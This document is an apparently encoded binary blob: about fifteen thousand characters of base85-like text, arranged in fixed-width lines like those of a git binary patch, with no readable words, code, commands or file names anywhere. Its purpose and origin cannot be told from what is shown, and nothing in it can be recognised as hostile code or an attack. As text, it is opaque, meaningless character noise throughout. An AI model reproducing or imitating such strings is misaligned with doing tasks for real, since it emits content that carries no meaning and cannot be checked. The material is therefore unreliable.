z(%!ypMe;#MK9vzq$2aYz>ftrE-#YTOjI4F&Cqa?{fwf&gwDvv#h%$^F_~r#9$xe^2 zG>9CB@_!eQ47<@4$(p>=LK0;!zL_DYFJ|!h3rWlB8`{d$`6yUtBfYu!b|Fc#pIrg> z%;3HpcI@AU@H-|iA`R`lD=?e54~G>}a#F)?XS$qAO9AU+->xEgtDVfeij(ek^V`TJ z_v2QJNmIM_6-gi7axo@T8$Nn5nSz3zEhfv!1moN#<Potgn~LfiG|tAUOEHyFb1pY7 zBVKe~F2A&lY>0T&S`>>V%uMknn{f400{WucKFYyoAPh<38rB&+R$OX0)S7QwPW-(k zke-;G1nc;|Vt=xmcz0&7IIPd%FP4*Wq$VG_f~3*sQ~353B#N?Dyle&ONG~1ZEmlI> zn#Q3kaTSpMQo={BBK7ILSmUx)gb+IRC||jn1jG3#Sxt&_GLNFus0)HIYT+8rms9R? z>L)qnC{hNjA1DmP>LekpvMEr~GB6L-LjC6hDH*kI1zxXm7kGn4FTgsbGg7$SCZo(p zBvh`1%25&tmn`G{lyQ?~wttW^Yl3CeF&Q;YMqQUsDuL1|FG(m>4p8XVGVHj3!K}1} z6jKC`Fq}6NCE+&7Sqb_au>UIM^}CE?GH#Mw%t8sZMxb=cc@j$XtyIiX8I~_#VmZ7* z)`P?+iW(zlH$cuVTh6YxlwCI&)k>gp44Q9bTpI}&FXO^wwmvc{Mnd_?s9G{=fQ$;1 zP&P8E{II0iAu_6_gnEo!GRUryxKty6GHdS0FalV#&=Hoo8c9MS_&$Nus~*UC2?ns= zMha~&^Ibb^%}BI!E4?a25XqZOBLprl&;<~|-r^Icvy5p_fl2*@X)0qHard9eQc{=i z{F&5uc{c(3O_<=tYvv{wNvq1s6O3<uCQYp4qvM2dC1Nhonge5ys+cfO%I`^=H4P*R z=@b@I3F_l70kDGc<3raG-)_&E%2@~l^f#Up;Wi7Av9<tFaV56$y;Kxq1PsMs&QgvQ z+91UzwfaOi@wJMox3kN#jrZ4)CxlMO;uklN*qSY}BvR9lm@LJ@eDfIYvysHqXd6Qn z`-MLkcO)BobRT2*;Eg23qr3?`Ioye}H)}S60#iYdm{H(UHsMD>fce646IR{n+^`9r z%HU1#v$jO@Ih#l?Qrq}=6WknP%avQmY}L5;AH{^QUt05h@*4TxEyM-Oy7ODe4AO~r z-%3W(`_1@?tz;-2+sqiVjZkZPK8!cpNh0W$a6V!unMqvuo1Iu<Iq?D``3fulhek4( z{@uXXVV79buBp%YZnA-N;3<2EFP0Sp_mH;qc|E>;50<pa#^-xT5uvk!`SyLpOsCd0 z?)Z&tp(M>XsEEV_)7P!|Did)fUVN8{d`0)R;vS{QrVejbN><Yut@-UzEKB+stsarH z1heVIGGe5=(~O44@S;fq5B-O%rHicjm4C=REU@=JA-_<T%=<sZWImkldWz)fMBeuq z8BY4})6YnjS9b&Yt1dAjJ@%^@Y~vV|x;YXc27m<q-6P`WaKdyS@B5@1LLV#mwCCg{ z%~Tr4zYqluH@dwdC002(3aaoXR1t%qMHpW3{1mY}l|xI!A`CzniZB}C4#Kwxxd<~5 z<{&IYScdQ;!a9Vl2)hstARIwBg>Vt!I>K`VCo9}W_OrqWK}bdDiZBFWBEmd`pAq&T zoI&^#;VnXSYpU=^h(TzJ&<|l8!fb@q2s;r@AlyNCg&-=XQc^`Af~XX};-kn#tVYE< zD3Re#<K4HUz`A|QVM2RZ0hwBTe8*g23e4H@VvfVr8`I6n*no(QZwh#}t6pi3*j%Jj zQbD&ECZ&#ekSN2afKngt#CLooz3WYlf?5F&HjU{kO)Z0?u)!?>?6r6$Uc54%snvOn z8p`9%<Xy<i2r<wkcf7Ok$pvR-AHk_SR)NBfrsig&g<sJTWYog5v?=CJ2SRJpRS`Uh 
z(B`BsA4q5uhhT|Zd=TObzJ|~+?A=_#1nQs-7bOUIZ;pl=f~CPTN~7rhFk`S4jUw<2 zdRx=RbXx<yz?vGc#pb7^#Uz~nrKG{+3!}OkEhRN>giwX4Pb-|bU}0s@oC-18+0rC} zft_wghpR9ANff5jI9e9pyV&_BFR`ObNG;yap7x~s@AD#i8YlLYKG@TsoYn25YkT*k zuO6kAsDo3B2B~vWi%bK=%Vq}UZh<gpCIkz`wLOb>(9fFg#zA**9}WX&Y9`ZtC)0Jb zq}yFVw?oi5%XC9zx_T9K#vdGLx~=PeU!fMF)gP?-ypKV-_L@=YOwl7hUgw#vbR;!g zH{NxnxkTe|?E^NHebqB?2@E|TQNJMHsh)9cZTgnd<(|e-o>Wb8R4B<CA-p1_AnuPa z24MvPZt*CNA>2iHjo^Uq!ucXJL+FMu1Yr)sE`-YnuMuj&w~0ph0^wVPMF@om=Me1C zDE<g75J0O`WZ;3Hb)$a9Aa7d3mP8q2g6J$t*Bv(=3Z`q7*wY#jMw`=@HhfbUP0lHd z6}?!w9Z_kvFzbP9Wym@K!EQGoD`m(k0qGz?7Rr!C0@6Z)=w--k0ST2LQ)S3B0fCE; ze8$O;@d9EeL5B0paN3mqUd%Uy)86!lo!l{k#<|rk{$SQx9Te?eW}`M*Kf?oV?^Ne~ zB4{1@*pE+(pbgxs?G(eV91cKsx>@t<4uXSH6UaWs@{$PJkQVOX?;@y&ZS;0Qr)<x? z8`3_tFBgiGm|wHg%$lpf$z0)lQA66O#-9>#uRE=Dp4b~#F08|^Hl+QmzS~at$Sk5^ z;UP-itr4w7w-)l@jcBlU-EGM4)6!7dB!@>~r`6k;H8pu*Bbr7hY~}A8q5nVF#$zLC zL(-ZLjilk!Z!7nWrfxhV6MG_tF4g(bNE+PW6%I~yR;J@(W5=L6U?VzdGL|!^L_r44 zegTla9%0rr<sOZxhx;!8nKg@L{Mt%9Rv=2A(U`W@Y(tJ(aelcL59x-U;-+CSAGLtE z@_(ih2j(?Pjh!euhQ8gzyF}4;n5uq?qAlsVP5f~bZA4dW5^~1U;?2BAH1)0VmB<gf z013ia`QjT2e0DVLNt}6UG!3lz4=k|ht+%vCfm@8qO_4_5CUgMtJln_`ju8aiATH)+ zyPDpG2)_kx%#n?JRSfj=Z6kg&hWdMS1|`;ig4hnk;zSn=4Pur0814~EXVu%>&{`q6 z2ik(`T6M}5i8x*OKfTsh(T|K(!udE8OH<u5kPGgkEeysEj8)kmreS!HN^Zi#n$lL7 z`Nub<o-kJno6=dG+V1*bPS)p7ElR_;>Z}f$?^tW8!WN+xf)7Gtgm{GZ2>lSIAk0Kq zim(~sB*IOEHwZObVf3~#j*g>CDg8dusBTU#5_+g1f6#&k&=n1h4hgWLU-)d3%Y22U zU%FLEEBx0NCz|iJ!(y@xLQjM=giM5i2wx(kAQT`>M#w^Fk1!13D}*ix3GMigiFCfk z_!D%ZQx+|@R+!2nQFEPgK`?KfL>q>E8H}-b68@u!hhb0Tc)|JXj(TM>pjZ>knIHyf ziB1`bbgae@%-1H-dM*jpm<hASn*Oc_j*)r)((K-PRRdm{MC*GffHSp-652fh$J_<m zn7z=-SURuf;mLG4e7sZ1)RhGD2gx+PQR_<|%=&V%6O#9iWH&}5N2KeIM4lIC`C-6S zB{pJ%27PJI8{RpE#?ah1d`=3DvUwXW-1<m<JcWk4`r~^s;?)d`ttePF6?aNS-@X5u zw@IZwcH8h`C`Qr5CwxpQ^`kRhbDl~woK&kN6@6R)Yp7E`S-{_<(&lbPB+Z(GtK{#{ z=v6DF^ww3pZA&^Ss6OBz_5=`Lk->#2DQ$&aHCwz`A|u~0{-h=C7w``E+tk4->sMfr zZpo@cQj65VN-F@=A#KkBXUntGXcN+nZ%l)IKDdJaoksWhwZ>>tWO>69B#Lo00LMwt 
zYjx>m6lqM?<0rH<o>&|0T2Z`hRkF<3t~DKP?S8TxlV{{1t*&4dRy67Qh2>&l155um zzt)akCO!DJ_VfZ>^O(=bpe=JQzZP??vb>Y%9;$;PrBfc4f%Q8}z>6~QHyOA>0xFGi zY92frFzl97d!$^Hg>uSKPHmJ^f61veNMYJ7z3{?p#yZ59-hq}Yeaj!<@(4DW&d!zZ z?u(6s7&MoF<4UN359o?-bH2cJSFxU{`aBlaYwhzyQ+)|Ot={V!zP>B1lcTML*2M1U zvOA*lcr_Hsyg(7b)4Ps0+w{`KPzTdQL6BE$n~ghmUiKASgCs81i<%Obh_DMO!!9FX zYAG=Vo)-vY`@0;UFl*!9i7zb1ug;kUjQl!)hr|c-v<RX@TD6bV&vHQ_mY*uqzqf@1 zfv>$qW_r~d#4_TpjCdd;l&7IK{fVdQgSJ*DvVA})w}#iE7ih4!6IqU?ErLPk_48{h ze!LrP-_RX?nF2?_Zs<a4;iEl=?L!x`71r|OeE_o4QKmsNdLBeGsFHc>FR4egkDT&_ zLQQ(HzRZj7KULJn2Q=OBBpFlWqsAqN$YZ!TNzIxhzVu7#j{}qgU(z7bwmMGah&mr{ z$YC3`xkw<Rl$lYHcr3WCF1RN0)vNC0h^Bj_7n;HMhU9Hwb^clzyGO#F)bmC?XoKWM zf-2S~o0i?z#(f;!PrCN2lUT2ajx$y~>TJw7bXN6~IETqdq+3hro_uu=+Q`#RG=xEQ z54WIAUeZ*nsV0No82FPO)SKecow_IWA{jiiC+$~f<0~sgmWw{O1Y#8^UEf$KvTaR2 zWuXSb<S6$)=UaMGXZrND@kmcPiFziwL0hTf8%n=x_2-Vl#EIIA_p()Kymud{$%9Yp zLmSY4Zt^XCP~M80{4Buq+nfAV9~y{*JCDB97hA{8`qEzX!VSK(FWv1Od;@Z;Qxk15 zcu=R1zpSLsRvshTSk(<XKKd(KOfUS&oAjeWF6;lqZC`6`UXimd#<a*zw6YiblaJ{~ z8#(u>#5qaMOS(bx;2z)Ik1lqzvbDxbg|^aHo{Upb8mw|?UVI!M(x1l1P6q_XD+NUu z?LXL9E7S`Q>JLg;p!?1PK>BuL#kPXD*QLq_(5&(1xBJro@+G$(fUjI9@CE~*fnGdg z0Bud5-{Z>$&_p_?8oxb&y0tH;X01p(;0!k#{=ODnRI5LgsK0DFHWfRN$1pJ!?1e7z zWtBOCaF;a_gLF|k$c@cov*tBKOf=*?gxs}}K?~k;AQm~Xe9}PL08Yx<fi&Fn<vsBd zu@l+^d7GwB!%Q}GH(vV3Ay`BHav<$P5_#uAbf+V|V}(_t=)f;;bC<8_+UQa{6q;8; zQgq5&cr3F?(JTMJLqh)RERV#gcNOZV>cpvU73#i<Ne&>i2H_4n{_1NQ(q)$5Rqwg) zJSO9)^5(6|tS{pUhd~m`V@#Bw@Ej9%RJj*$XaR-qz!P4;R3yAU>YL?!RJj^y9F739 z^p<hVU^<Or`|0&JG!nb+^@h@B4wuj|#Jju7n}6|9L$O92$hQoo&gjjDhtf8-ohQH{ zQhmI}-G;%3y?71QLx0xfBpuXOPTX(^&~P)y^WMX#3oV+!#}1=7p1#4C55r<{;%$Cm z7;TNc9Pi;YgZ^@rXAY;nUinw$tcq}J57xn3?1Y^#-I9(MWBA75G_XbzNb=sAVXIO= zl&5OQ?+>SwY};B{D^hf!Bly=NXrkI0sj_{-!OSpg=8osa5wtx$J(Syyq&~Gb4h6EK zw*Lh*@3$1quCqRyLP8e}<q0Dpk{{QP#6X%ej&B)>p_of}SSDukU1Q~W+@QrL3*VBl zEv4<XJ!5%(Ch|VljsKB}fi^+G8;^o#b}@^0A4S_lw;O^!ovk#PJBslWUrs8!oH%5> zd_?&O<wH%m*`h0Xg@9VCi%;U$M^T;qV$8w9f0|ux95I@f6DPwUIkV;&!t!~2&BtcZ 
zBvofIGeTJh0CMApvuJ0}VptoYxc0@;yikZFOmJPa_rZZYDx3ONHv(jGk<sg3@&4Jg zVe9g9;L025rqJ$f^uz7YCH27+SDcME2-{*OuIWf2Vk$n~n2O~@08&`UHx$nqBY?pd z0xQ$wNAX+PG}b9w<cIAFt@aHT;mQ%b?pTcB8a#b0{erF=$$uJ4W64N<Yb<qj9+@d} zKT?LvML53w3aQ8<rhn`aBBp6y@fFJi?1`E+u@c?ha&#`ShRDG5A#ofV$=i;jQB9vq zQuf46@w`I`edImLFFvuKkkEyKJre7q&H;U;3~+|}CEquWM(0cef%#~jnNHd&<<MKc zyQEhh#I<N`q;kR;3=Au+`3^QlM}StCQRPM%*V_X3O(kxLj7ze>HLt`K$he?SxSYUx zGBWRRFftx46I2rfHo{DzVBEGFPAZl!(!x=;mU?B$X&7_7OZja$INyO&9J@kf0ne%- z#zF*^L}&BLCm51R7S$K)l;ZCMz#y(Hu5^0&)A7_UC+-*FFKv{XRrA+b(K5J$g_Twk z?!jWNzb}DKAnzf_K$!Br!bk_m*i!-<sca`uIBZA%m9W)h>;V}YQH32VVNFA&oVN;W zPNcGC6}qp4J}#pRW#*TsDzk1aVK>OwpJnW&Dr{p3J4eQ@l(D<2u-+0jQ^qclvEK`9 zjwH3MgzhM#nT(!P#r(XFsBvQ%Yml+MtFSjDtc#4DD`OL?uty|p`8QIHbu!kk3cIC` z<Y-)z(Rni3x(fZh#Jo?&PL{EMovhSHzJy&NW5>zZk}B*737adhk;<(C48KhfNfquU zVf%eUas+&$%sjh_IY~mNd{*#?Dr^G@8zf_MWZsM_tc!%Tm9gK-*hW=Yg@k>C7cS&- zQGTS-xeEQLw@~#-8J#UNzdlh};~NrolZ^dZ#$Kty?v$|eWbBtRc25=dR|z{>#<r2M z%TD0SOR_@dOX$urI$lOksbZcaVWVYi3mMzD3Oh)`y2;pB8Jkpv&5*GF4wh<MU&aPh zVRM>F=o>ORP)1j)LI+6L{W8{7#+r^->Z7`ZT_v!Q%5ws2(9{$}QX7}|61towV+#dV zr+f?;Y>RYD6IShyuM=R_DvSy&?rYr0mv3PT8W3co87ohI^jC%3+(}du`BxC6^M;dY zf=e=-+_B!6g+{<HGU!d1gW^<Se8yy|r4L^7bCYQ>-TRuqn@qDvD$kq(_acH9Org!} ze#A`=OqR>K@#9lyxZOlKnI$Ft-1N$hCE{hj-~Ep#zB!xXUzFl-5KdA&Z<a&7ahlR2 zhjyg5kMhkqG=mJ>nM?Bs+_(Ixw1N7kQkcl|vLOvL599}?(ov)tZ#a!UZFK(_D)B$- z|5Fl_l)k!wg{H-l(V#3mX6%$li*Uj7wox;kZlJ!M4j~6amo)LJ1!l=K)1yn6ehtd{ z5?nKk-<?VO(=EM>Ep@cOn!f$Zc*;O=q;aN;@%B9GW@G!u4NUkNb31P4w7H$Joe)Sl z^9Ih}=|;L_6Mwas#@TJSF16|M>&Dn6bhZ*_J4aT~WjKWDzmkrpTh|zGuB2TlHUgr4 zpjT+lPe%2R*gNu{wgy`TtVsC%RSRD+1$tdwExL{a4x0I?pJ@u6xSH4c1v(4k{1=*` z`~b^S%rmm6^P)AhT8&#sChD)Y5;u>Yn>7zx7+u#;oEH33!i#>TF1T`a`Bypv%zf6< zzi=|pavio@AN*h(vW{94nzM|LTu<AOM#jDCaT-BSd~dA3k%m&wti^a|E$@(Rx^6%~ zMxuJZS=;|LR9Ixz%xc23Hq)jJqCsKSXq!kX7Pq*}XLo;%X?##h+}mt-oV>VTv0x_= z`5UiorYTA?g8S^CLtOui|6o=ZOcx%5{<Nu4OKDw@^BrHggSyh4@qE_~ETd+|8*!Dd z0IxyM<HL<K4Qq@YM*0$`c<Xl2kHjUwAOt*Y`$@J{W=#vee-DkbEt@Sw`%s^gz0}RN 
zSW4ZjZ>+PI?jUqgwDHP5nq@_|%;4>cXc#RC<Wq{!QTy`cMbxd~xIokhautpfu9`na zVzHCfd@B1QnkI6FXqq<Iqdtbuqr?$$*(r_xRYYS*6!$p@cY4=!-tr*rXZv!x5MfRL z-*S*P(D)){m=cgT(UxQfX!{?53HY#$KRZYhn;kDemR9gR9ZN8j-}{TgRS&iUXb#*I zAo(*o)nSp=sgB6eQ8_Bv&PV)CN7YXiNxiB$qEfN6$3iMe2E`#Nn}~EhIqlEwi)mfD zemajVrp??o7D|l2AUYrxv$$5>7cZFl^BKi-boH_Vn3;1r><H_X_Y1hqA?okA2e7gW z!on2!@#sS|+h@r(@ojN9M|tt_F2Wgh-i@t2v*{p=%TZ-re*6#(NSX{HMc%uQ*)?%T z3(ul3ocjAAGfm#R57}4%b*%y)1XzEi%r)=b`)r(;rv&&ORmSp&!!(QjI-UP=nD+6S zF%^PKdtsR<67Q(%TjBCEoKMV3b&P&T=zc;k>iNB+v`I`SG+9=X*dOwEYIYFc0ap6v zi+aQR(#DnGtMO6z;4U1rdZKN0Gj>VcQt4^zP=bXmy*Q0eIEF2LTfX5K_4Lc%i2a&m zTb(io4_bX5j+}%^C=lSwSiR(j@JGk!pm<NTD!#vijU8ex$*zIsu?M78+-a0&4fBf~ zowtzUso4rWZ9Pu4%Ib^L_8_#?!KvJEoOYvYCh>>IX+7LhuX%z-yUz9$TWIQhu{suY z^%ZXUTu<KT1YPH~7fa-_+Ni`j@!*7qCE~#b4>PCopp!WE^XBbO(g^x$DxZ3iPV+jL zD|19`5f9*qS}7jD5j7{5`<|lrYD`~irFfI<=7<8bzk*=>c&*d)H~MQXKYtqg|Ixh3 z8G4?M$>9!XX=51lgtPPr9X*BHo}-;%?RuTV#_pP2&d<?dq?OV7JXMkUaXC<1Y<vKs ztopmLJjI#b-{PXY__%{g1+Zzh*uBvy32%0Ro}r_1xauNyPulUwizqyQit+hHoRre3 znOt?5Zl~)f^5V<1pHo*X+k{8mSG=GQsf4k;0`4o-jn%Hwd(>~<7-%1=w(g3}Gu51> z!plzFFZyAkI`y<pHEAigzd;)(jU9)5pyuMebc5=7Hl!IPzNe_y{Do(&e%e#fIdDN| zvXrtFO#xpUDgCsIK<SjPNAuhpbZ6M6ER17pec_~68H9DJ{sKyuE>)R^VtnAurP-iJ zH+&s~PJ^3oH*q|(Kbvp3Nj>P~EPm`JEv456^X<1V9X8=Xx3S}0Fq(gLn+DWAFdDDE z<sEfPG#^TjE1z<@Ro)TtrR<V1#uc~eOoHp4b??%j3GPUox`!4pW^$YR=uVSI@UQOU z?CR`LzV1H$Bv~*o_>%^FVTHGbOw$%iDu41Ps)b#a0Bjdw4X2C$3jotV8F{_}X|u~6 zH7)apf*y_lz0MIIPdXT(HQ;Oh<}>1)Ou6PyZvK;cra8mv;Z<MLm;In8y=sEUEwK}d z$_pHhXW`=ni@#5xLp~LMmq1*zF{s9ijN`73P5|=#DBkY@<X)=a>mSfYu3y7?NS9wU z4~7e><D;8^Y6yS%0O#n{dH7${+v<r~Va)golZ9G47Z$LNUYUScr)tVOnP_;9eIGCi z^MOCmldgY@-A=tJU4IWt&X3Y66n~HC-CT$n8*iE;{F<lg0(p6>DuJgZeO16#7%*xU z^^%SrL-A3!53q6NUDXA5q!FrG23oO~ibJof$X6y*=l>3G9z9jFNci4j&o&j`$cNUk zK`Qvf4WSFj2^9G<1$tONh+)=v3POP|l<`?r_|_8sJwCS~;hBsdR)udQ;crynb2MWF zflk=~V3eHYi^BR=ies$IrJYP<Hi)uopa!7yYKyC!c6bfPtho(oQt|DXpj|M*ic)+4 zLrS`$p~ZKt%^DZ*??NkAe8f_(+5xZ@7SOxDHa2Q25?S5NnrBj_R6huuSkT^m&%GYe 
zR%y`{#EtRQC|N;SA?CC4@i6wR^(wClf?8(HHx&e;)5<h@)j$8Qy?+hMqI&zd@wsN^ zLR3&t5KvT5-0#rTaF=M5SZJtJR9aZ3RN9Z+6q$9ITH!V;ZCP4kX<3<3X<(V5S(#a4 zQDISHSz&5nQDIs>pL5p24Zr*TAOGWcUOaE^bsQ(3?^<)N&8*on*P1onML%7={4+<= zpVt+xIAYiH*)N|^YmVA)+OJMj<Br)^+D}ebn~vG9*stEKZvMrd<7=lXf3ah;i}GlV z`G@}q@&f;znKZY73`A$2m4^-ULmv~T#i6^n+Ihd;@N?{+bnD!9ceB9k+j3(k15(1g zuYPc7bf-9Tw|0R)UQPbhj<u)%sTTaoQ?TEE<~-ufxN?F2%d4r+Jza8y)$5{m{A#zW z|2B(h$<tS>s$Y4${No=gtjdmR^Z?1a#Iy?{Iqg;1*ZM-$(klD4kT;k6tZ5Mw8+Z2? zEmtFt+Yhup{s*uB$ysl{|N4a-jo-*aWd0#&w~*Hl23@9pJ8oZm>xCS)l~*w|T`s;! z>?f_{%E&m;BpyApI{u9~urBqy3#LC;ZeZ|CX2~p;eBd8V3J*q$Kk%oaq`D9MR~aRf z1X!uJ6-(ERRI7ipquPFvK>_pA+_>6h4B-g<ur?9Df0n8Jzu75)D=4G#-?_SB%)909 zD-EGx9ZkdD$AN~mmSl!U&XdO6$zR==9F%U%OrvTml*Y&;xeH|^{QL+R1bg{1en{vm zmm)bydH-ECJ(@gs(DzKyXQke>pU(ntqPs!8^1D5y(WG+|yQt39_U(<2%sI#LmFo+i zueO;bG+y2Gr#-`WLE-*C?f1AzAF1+d>=GZtO-|U)`s~~^)$F8QVDJA}?K)|vHrmN! z;c4wtZ~BlUbm<J$>Xdy~#9&FABEO0<nbG#s{<OvIT=l{!yO0+f#{a{pi(}K&_J0`Z zGHaUZ^{?GGB86*Ta^qzm$XhwX7p8@BY+j>g{mUIMzwi8OUub_dRh9m0e-iWJkNljo zuu{%NIo`QQK47*u^!Gc|Tc^3T-SmU{?liyZKYYjX)=s=HWBCy0WqVuB@+v33;g}z| zu2vo4)tTWc*5_R1>#wHyoQ?Lh?^Rpd>B;TDmA13Re(*aL<`BJ24RxG#Jj1SZoc8w9 zQ&gDi#Q7$uo~{$Y6X;7_XK+;GgWf5pA<rw*7ruX3F_HP{$lV9kD%a_5e>Yj}ah)|0 zlRl?2a?b0FuIhfjvp;_70m(k2@##pbLf%rS{QNrZviKe8Bk^7w*-PCM<n*!2a@1=< z&Jp|9!D@9qr(ONb!7`Mo&%s*?Kd$HS6rLd$4V)2n;n#($8#ohv48aNtaoX@NYNrtA z4*R$MYE_7HH*YL83v~+YC1r)Y^Pa}{stO|;JN13?4^Nmg$gcTZT_5Ibi%I(2Tcyaf zg(I@O*I7OrBEvWyDJ|?1?gZPR|9Qi)?!7PVrjzVj*Qv{zIxTtmEW4?5v3+8*dbz1{ zU0~KFoEQ9+;}hf{U~-uOp;L9r6*{FODcL$@kWS$yH}ra)(nY5vk&>ZPVsuI}DVOP# zdO9VQlw_UqM_aG1Y*I${(@Ed!q#Tk`bjm)Rl1oZ|o$`*CvT(K>?tGn56-PJ`&EoX3 z<$Bpty{xJFIl{Td*Qqci(pl)(PbC-bi*_#ZT{ezQ!Ma}C%Bw$^QpV_%RGkt=%5a_1 zSEpo>63{6LIwgyg8H3d|&7CoJ@kNCjn>+h_J&p}z8!tRLe0~u9TuEg3{7boZ_<zt+ zj_fvrywpr&>%xt(&PtbK_Of^<Jf!i#1e$f`hr`R&t=*h%jn|!**jPQ+&FK_2<-Ei% z+o=QHoB{UKnCD}=J3hOlsIXNJXMx>wZI;jSZbeh)KjGbH%)j5evs~<NezV*~J|SnV z)cN;^2^RYwm{_>Kr}H1jmr^*qk2BY?iyNs=lAPbdyYisAvd0N|#bWvp_V5I?ub*?9 
zo&U1BsK3MOkLvpV&VTH8Le$>=&KTdVs_g)$pU+a`1~^&1sKRXn9ERibm|&2T;Tx_t z4RSjA;?y^ToC<!4+IErij6Lr;b>m>Cr+uQHT0R&jw%cIm3j5u4YCy6xi5JnHO{Ux+ z^;fd<zP;D4-WlR#*oU7jjO1ANH7R9XD!=^IYu!b(ZqLoC^TkfQ{pvGn#KlgRsCmzL z$E(a6+els|;@IV%>yhf=iz&2u;rACi&3*R6wmO~SObwoP6CJZSG(z2di8Cs!8L_m* z4<&p36FP5<`sxyAhP`~X8g;1?WzSo!ZoSkQ9u>bvDrhYASPMrSGS}=bYWJniRjtaO z_KwVc3rAFrSp1;uw0wf{O*>3(^NOEV7Y%c6Zd9K$`n@-$-t;>=1^-69I?U<RVYmDz zx-f(pDz+z{j!dBxu3ejT;_=Gds((35{p;>mzEo#8r`yX@oyYl9WZ}w@PLNL>9`1xU z;KX1p+}_21ZCK&fE1b7{>YdA-AbVva6&U3_TEAW+xdDx=4pq%ZJCBFugyQ_|CC-i` z|KV548$(s`Xy=X=KZS4$uwc)S&no^Jx3fiYJ6b<GrD5?x|ED1;ZH&`VZ5`oUYA-mU z(o&t}_SX%i`Y2z6Z4GqIZ#IycxBKjq!Cs}olY+fUGgQoIM}?KtJGagq^}ITp4<q$| zth1N8e2g>M{`~jCEn}QXE^kc5XF8Gg8%|+Trt`gH-*H5>9P4~+FG*8J$2u4I#;dq- zPJ8-h*f^)1FF{Qi=k&D?pHl0_Ib-c3{}ejcJHH3pZ!}Of6P+vVzwT34OmZ#=9nCdu z+N9K*wsWp-r5>K-w6hBx^~NNpqy6o@s$!BeHgv^QTsm>><UgzlYIwFY{L<$2Wozx2 z`(5kQ?KS??+jeITU+5OI?ZQ$WdHS;8Uilo~M4ovBbNiRXrp#kj0)AZlcScBMw}#%v zy|Y@CWjh`0&9jv677pi%Ds|B<9A1+OufN6V=CkAJAfCI~cbBVmw>nQoEdLM9xHokn zm)`@a+fQ=2?sKggbDMKv$lo))J)RNvB{K^jzm2P!U0lEL{VC2=pD(Sj-+!EqZurfI z<-zL^oB3&dcXB+mQ#I3^xEAyJ$p01}zR8wOPT}8}IBuMC<Rsy5UU<QD=ae0>?k1`o zckYF;&#mg>yV(6cJE6Y5%Ng46^px7_d66ntF29Ata~<ZyZlPYA>9n;E@cQ6Pr;UB2 zyE-|O#o;RU9w)ATMX{WPB45~|F1g3)9(+xAIT9nURrlQEBzEqnV+%OAys?D(Ki<1O z`d7vTG32DOmp+H>@1_2^$BAWz;V^RG%m2Wq?s0lHyzroH&1lJ!w)cH1X%^>?9G_Y; z%W2#2wF<^W-YrXpsI9Y{VfG2D(0{M9%&}h@sF>)vojtEW?U?NhYPH#$UnG+o)iC<w zd5OtmaCt|<KmQ-q@_wf?0~J#5cRD5<9l$xsn>S*9%S3Tp*i`-{8_mTaG|np~bhuh} zzf)`%-=eOX<8-!X)mL-oIP;oZ)Sorv+4TJIyivid|Bt~cdajcYUwG1%y=4Ck=9~;2 z#^!n7zm_Cl<wv|Z!b6`_HEynRStFSpq_T(`8vb3V`de+D>kJC*C6k1h!RyV`>A6l+ zw|~hhW7Y4&UB;^43B9rEKd``i+EMwed`o2Epwg4JD*Tt*%L((G0iFJMMfy|*p8xa} zXQ0KA<*(=s(y{Ws9c+u*A?xGRu6fQ??UryEkb%>S{gXX4B%0wZnQRx<#Fu(gD$myZ zH>!&ta4z*-pcXvfJkQ(4y&iO?@Mu5(L2gdgT&R9{(3u!{4bOsy&rb=i<ZYD7w40J8 zUptlc5c!&^=O5zs=|aVqsJigdNB=x7$fvgzKAgt|+1@l>-MD}^)+v2~v)|rQU3l|C zXQ9uY_m28)ku$>=S(v@p8RfG-D=K_ziL=?U%e$$mk2;;~SG%dF9(9h|?{-xSA9H^3 
zH7%UE%$doXCxw43cRsh<&FoOSX2tD94GH`2H5;jZUE%aj@5hnGnc}sdz`}iL^Zkh= zjNmzM)8Wzy>F&t+DGk!o7W$**kX#rUBVd+n_843GC~ba9xGX+V=`FU^v?rXDW)HO2 zT~bAtRGBW>lAu0*!s*5Mh9{k<q;8DX+QYf0rAPfw=a6@$?BeMiQcv$<AMQo;bmS%+ z*e~13vc+5&uXxf)vVX`_^PhCG?75Zd$dk_7^(I`-6{}rP;VUa0UiHY|tRkOw4%%;g zsz&BJtsD5)^9Db2wuYWkcjY@h)#%mE-#qpnk?+JceC0W_?78O(bMu|IUEay*yUw|< ze)byan3l&sDtvpL)6!`=a}e#gX&0B$2X?cIoQ}MEkUF;BxsLaXhri&Awzmu{eCh>f ztB)I|YhQ9AefBr~)Eyg~%k8E8)V2+rpzrIaDmOU8*n1LRcE0uvDGb@@)VFQ5T}2f* zt?Zv3R~HsIhvmZYs&lnnJw(lX)yc8v3{gj4b^3BE(DpTlp9OXfRxiHp6hzN#?^uoJ z%AAv&W78J?HGKQOoMXEUD4e><Y2u4aZzqcn)RPxci%0OBXL01`gVYn7oih96KsD_R z=RoV`15cg4Y~iBA$@c|WL;p<a89aOXEtf3}>B%ogl}sL}?kIGc+LZ&;gN07~h#we5 z!>vgqPhn8}TaowTzo+MZbo%g%{JXdClJdn7*8D5WkMNUI=#v9Z@t|)+Ide+X7C(Gp zX(~_I<D_``SE;&?Yu*^uyvTVs_J*#t=i__3d1_j}d&{TaPJ?IkS0{>`>mwrjpE{j% zW#;sVBOz}x(uS=PX&2tM#p&Z~w27f1GM}(Ctf-6H_@)zMuS+WY@J(m3uVFn#?6Qcr zyV|Mbtz7yeRpwS_cC%%DPo19F@5-|2k!K5>-B<mxm5tLw^?loU(4Lj0w!KYRU)-ej zzs*VZi<=+c299K_4$zmaMr`9BxX)*(8It_WOtnh*?i|S#rM}w6xz<+xcbwI}v1;8r zPM_=T$4_y-T97Q;>;CO>XM6b9<>w~FNmBWFNpfR%_`~y(vLxvZos=$RF}2s>-H)iG zVyE|roO9Am9plbR^6I$kyd<xV3(rgP>PS#qik-pjf*(2CM)?$X&C*k+ldt3^Aue?x zvp$aCmxmMWRm<(pefGNL>Z$F{qe=T7KAYwK?eeq2;ce$6&E1}Jc;h*7<FfK$HED;F z7BS+yMa7c4zxrSYeIB8X?QmL0RxdfXc+cVB5*7chlVHEKq;S}~P9r<~AzE46*>kt& z9==OWe9vhees!JXVe0YsoG$$bFFNae|91K3>~PoflA@*4W6n#;lcXSZl41w^xbVO7 ze|BDym%sSDBrpHV3k$D&-?^2a`W`Oa{(%$XYtne}*`l~RJA8Uk;elOFvd=y-TgC5o zW`xd}jl<#viPFeB3!mN1?X>UK!WTbsn3wLCT+WbO^2c#jozqNh-RpefYpxcSIAzY} zyHBa;eNJojz&>X|uSlL`b9#O5As>SrxmNjg{OQ{GA2HtY$4xx+<(JfuPn{U|TBgxZ zjaND?<1d*eH~1}kk-#rZGu|_I8gj2A!-YbJs8ydjT>_u8oNLP`;-)XBA04r*%jUa0 